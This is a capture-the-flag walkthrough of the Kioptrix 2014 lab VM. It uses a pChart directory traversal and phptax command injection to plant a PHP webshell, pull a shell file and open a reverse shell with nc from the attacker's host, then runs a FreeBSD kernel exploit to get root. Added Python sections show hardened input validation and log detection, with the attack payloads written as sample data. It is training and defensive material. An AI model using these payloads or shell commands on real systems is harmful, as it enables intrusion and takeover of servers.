# Lab setup

Download: https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2

Add a NAT-mode network adapter; the VM's IP address is 192.168.74.137.

# Information gathering

## nmap

Quick scan of all ports:

```text
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:50 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.77 seconds
```

Probe these three ports further for service versions:

```text
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p 22,80,8080 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:53 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00040s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds
```

Port 22 is closed, yet it still shows up in the scan; my guess is that the proxy on port 8080 is responsible.

## Port 80

A quick look at port 80 turns up a hint in the page source:

```html
<head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>
```

pChart is in use, so check whether it has known vulnerabilities:

```text
┌──(root㉿kali)-[~]
└─# searchsploit pchart
---------------------------------------- ---------------------------------
 Exploit Title                          |  Path
---------------------------------------- ---------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | php/webapps/31173.txt
---------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```

It does.

## Summary

  • pChart 2.1.3 vulnerability
  • Apache 2.2.21
  • SSH brute force
  • HTTP proxy (possibly reGeorg)

# Exploitation

## pChart

Read the advisory:

```text
┌──(root㉿kali)-[~/Desktop]
└─# cat 31173.txt 
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A
[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.
Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.
Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.
```

Looking at where the flaw actually sits, it is an arbitrary file read: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

That returns the file.

There is also an XSS, which is of little use here.

So all I have right now is a file-inclusion (LFI) vulnerability; I need to combine it with other information and use the LFI to dig further.

We already know the machine runs Apache, so read its configuration file: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

```apache
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
Include etc/apache22/Includes/*.conf
```

Port 8080 only allows requests that set the Mozilla4_browser environment variable, i.e. a User-Agent starting with Mozilla/4.0:

```text
┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>
```

There is a phptax directory; take a look at it:

```text
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080/phptax/
```

A pile of components comes back. phptax looks like a CMS, so search straight away for an attack module:

```text
msf6 > search phptax
Matching Modules
================
   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/multi/http/phptax_exec  2012-10-08       excellent  Yes    PhpTax pfilez Parameter Exec Remote Code Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/phptax_exec
```

## phptax

Using the msf module directly, there is no suitable payload, which is frustrating.

searchsploit has an entry for it, an RCE:

```text
----------------------------------------------------

drawimage.php, line 63:

include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

----------------------------------------------------

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

----------------------------------------------------
```

The pfilez parameter gives RCE: a `;` terminates the convert command inside exec(), so whatever follows it is executed as well. An exploit is provided, but it did not work when I tried it directly; after some reading I found the reason:

> The FreeBSD version of nc does not ship with the execute option, which means I could not use it to get a reverse shell.

Reference: https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/
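Both flaws used so far are the same mistake seen twice: pChart's `Script=` parameter and phptax's `pfilez=` parameter each take a file name straight from the query string and splice it into a path, and phptax then splices it into a shell string for `convert`. As an added example that is not code from this walkthrough, from pChart or from phptax, the Python below shows the hardened counterpart: the value is URL-decoded, must be a bare file name with an allowed suffix, must still resolve under the fixed directory after symlinks are followed, and the `convert` invocation is built as an argument list so no shell ever parses it. The install path `EXAMPLES_DIR`, the function names and the `.tob`/`.php` suffix allowlist are assumptions for illustration.

```python
"""
Added example: the hardened counterpart to the two file-name flaws in this
chain. Not code from the walkthrough, from pChart or from phptax.
"""
import os
import subprocess
import urllib.parse
from pathlib import Path

# Assumed location of pChart's examples directory (not taken from the page).
EXAMPLES_DIR = "/usr/local/www/apache22/data/pChart2.1.3/examples"


class UnsafeFilename(ValueError):
    """Raised when a user-supplied file name fails validation."""


def resolve_in_dir(base_dir, user_name, allowed_suffixes):
    """Return the absolute path of user_name inside base_dir, or raise.

    The value is URL-decoded first (so %2f..%2f is seen as ../), must be a
    bare file name with an allowed suffix and no shell metacharacters, and
    the resolved path must still lie under base_dir after symlinks are
    followed.
    """
    name = urllib.parse.unquote(user_name)
    if not name or name in (".", "..") or name != os.path.basename(name):
        raise UnsafeFilename(f"not a bare file name: {user_name!r}")
    if not name.endswith(tuple(allowed_suffixes)):
        raise UnsafeFilename(f"suffix not allowed: {user_name!r}")
    # We never hand the name to a shell, but reject metacharacters anyway so
    # a later caller that does cannot be abused.
    if any(c in name for c in ";|&$`<>'\"\n\r\t "):
        raise UnsafeFilename(f"forbidden character in: {user_name!r}")
    base = Path(base_dir).resolve()
    target = (base / name).resolve()
    if base not in target.parents:
        raise UnsafeFilename(f"escapes {base}: {user_name!r}")
    return target


def is_rejected(base_dir, user_name, allowed_suffixes=(".tob", ".php")):
    """True if resolve_in_dir refuses the name (handy for tests and logs)."""
    try:
        resolve_in_dir(base_dir, user_name, allowed_suffixes)
    except UnsafeFilename:
        return True
    return False


def convert_argv(base_dir, user_name):
    """Build the argv phptax needed, as a list rather than a shell string.

    The original was exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
    here a ';' in the input is a rejected character, never a separator.
    """
    target = resolve_in_dir(base_dir, user_name, (".tob",))
    return ["convert", str(target.with_suffix(".png")), str(target.with_suffix(".pdf"))]


def run_convert(base_dir, user_name):
    """Execute convert with shell=False; only the validated argv is passed."""
    return subprocess.run(convert_argv(base_dir, user_name), check=True)


if __name__ == "__main__":
    # Constructed inputs: two legitimate names and two hostile ones.
    for name in ("example.drawBarChart.php", "1040d1-pg2.tob",
                 "%2f..%2f..%2fetc/passwd", "1040d1-pg2.tob;id;"):
        verdict = "rejected" if is_rejected(EXAMPLES_DIR, name) else "accepted"
        print(f"{name!r}: {verdict}")
```

Running the file prints a verdict for each constructed name. The order of the checks matters: the bare-name test runs before anything touches the filesystem, and the final `parents` check catches the case where a permitted-looking name resolves through a symlink to somewhere outside the directory.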

So the natural idea is to upload a shell and run it. The simplest option is a one-line webshell: http://192.168.74.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php echo system($_GET["cmd"]) ?>' > 1.php;&pdf=make

System commands can now be executed.

wget does not exist on the target, but nc does, so try transferring the file with nc:

```text
# listen for the download request
┌──(root㉿kali)-[~]
└─# nc -l -p 8888 < shell.php
# listen for the reverse shell
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
```

RCE: http://192.168.74.137:8080/phptax/1.php?cmd=nc 192.168.74.129 8888 > shell.php

Once shell.php has been written, browsing to it executes it and the shell calls back:

```text
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.137] 19685
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64
 3:03AM  up  2:26, 0 users, load averages: 0.11, 0.11, 0.04
USER       TTY      FROM                      LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ whoami
www
```
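Every step of the chain so far passed through Apache as a GET request, so it leaves a distinctive trail in the access log. As an added example (not from the walkthrough), the Python below runs simple detection logic over a few constructed combined-format log lines modelled on the requests above (the IPs, timestamps and byte counts are made up): it URL-decodes each query parameter, repeatedly to catch double encoding, and flags traversal sequences such as pChart's `Script=%2f..%2f..%2fetc/passwd`, shell metacharacters in file-name parameters such as phptax's `pfilez`, and requests carrying a webshell-style `cmd=` parameter. Which parameter names count as file names is an assumption for this example.

```python
"""
Added example (not from the walkthrough): detection logic for the request
patterns used in this chain, run over constructed Apache access-log lines.
"""
import re
import urllib.parse

# Apache "combined" log format. The request target is the raw, still
# URL-encoded path and query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Parameters that are supposed to carry a plain file name (assumption for
# this example; pChart uses Script=, phptax uses pfilez=).
FILE_PARAMS = {"Script", "pfilez"}

# Constructed sample lines modelled on the requests in this walkthrough;
# IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Apr/2024:09:55:01 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1823 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Apr/2024:09:58:12 -0400] "GET /phptax/drawimage.php?pfilez=xxx;echo%20'%3C%3Fphp%20echo%20system(%24_GET%5B%22cmd%22%5D)%20%3F%3E'%20%3E%201.php;&pdf=make HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.5 - - [07/Apr/2024:09:59:40 -0400] "GET /phptax/1.php?cmd=nc%2010.0.0.5%208888%20%3E%20shell.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
10.0.0.9 - - [07/Apr/2024:10:01:03 -0400] "GET /phptax/drawimage.php?pfilez=1040d1-pg2.tob&pdf=make HTTP/1.1" 200 9021 "-" "Mozilla/4.0"
10.0.0.9 - - [07/Apr/2024:10:01:05 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBarChart.php HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the matched fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_fully(value, max_rounds=3):
    """URL-decode until the value stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(target):
    """Split the query string on '&' only, leaving values raw for decoding.

    Done by hand rather than with parse_qs so that a ';' inside a value is
    never mistaken for a separator on older Python versions.
    """
    query = urllib.parse.urlsplit(target).query
    params = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params.append((urllib.parse.unquote(key), value))
    return params


def analyse_request(target):
    """Return a list of finding strings for one request target."""
    findings = []
    for key, raw in query_params(target):
        value = decode_fully(raw)
        if "../" in value or "..\\" in value:
            findings.append(f"traversal in {key}")
        if key in FILE_PARAMS and re.search(r"[;|&`$<>]", value):
            findings.append(f"shell metacharacter in {key}")
        if key == "cmd":
            findings.append("webshell-style cmd parameter")
    return findings


def scan_log(text):
    """Return (client ip, request target, findings) for every flagged line."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = analyse_request(rec["path"])
        if findings:
            alerts.append((rec["ip"], rec["path"], findings))
    return alerts


if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}\n    -> {', '.join(findings)}")
```

Of the five constructed lines, the three from 10.0.0.5 are flagged and the two ordinary requests from 10.0.0.9 are not. The decoded value is what gets inspected, so the check is the same whether the attacker writes `../` or `%2f..%2f` or encodes it twice.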

But this is a low-privilege user, so privilege escalation is needed.

# Privilege escalation

uname -a shows the kernel is FreeBSD 9.0. A searchsploit query turns up privilege-escalation code for it, so upload it and compile it with the gcc present on the target machine:

http://192.168.74.137:8080/phptax/1.php?cmd=nc%20192.168.74.129%208888%20%3E%2028718.c

http://192.168.74.137:8080/phptax/1.php?cmd=gcc%20-o%20exploit%2028718.c

Compiling 28718.c on the target gave me problems, so I used a different one, 26368.c.

After uploading it, compile with gcc and run a.out; that gives root directly:

```text
$ gcc exp.c
exp.c:89:2: warning: no newline at end of file
$ ./a.out
whoami
root
```

# Wrap-up

A lot of unexpected situations came up, and the approach I had in mind never went as smoothly as planned. After getting the one-line webshell I wanted a reverse shell, but unfamiliarity with the tools and a missing understanding of how the callback works underneath cost a lot of time; once the target turned out to have no wget, I did not know how to transfer files. The everyday tools are not as well practised as I believed, and I need more practice.

Some of the specific failure causes I still cannot get to the bottom of: why did 28718.c not run after compiling during privilege escalation? Why did the reverse shell fail to establish a session so many times? Answering these requires a deep understanding of the operating system, the design of the tools, and networking fundamentals.

There is a long way to go...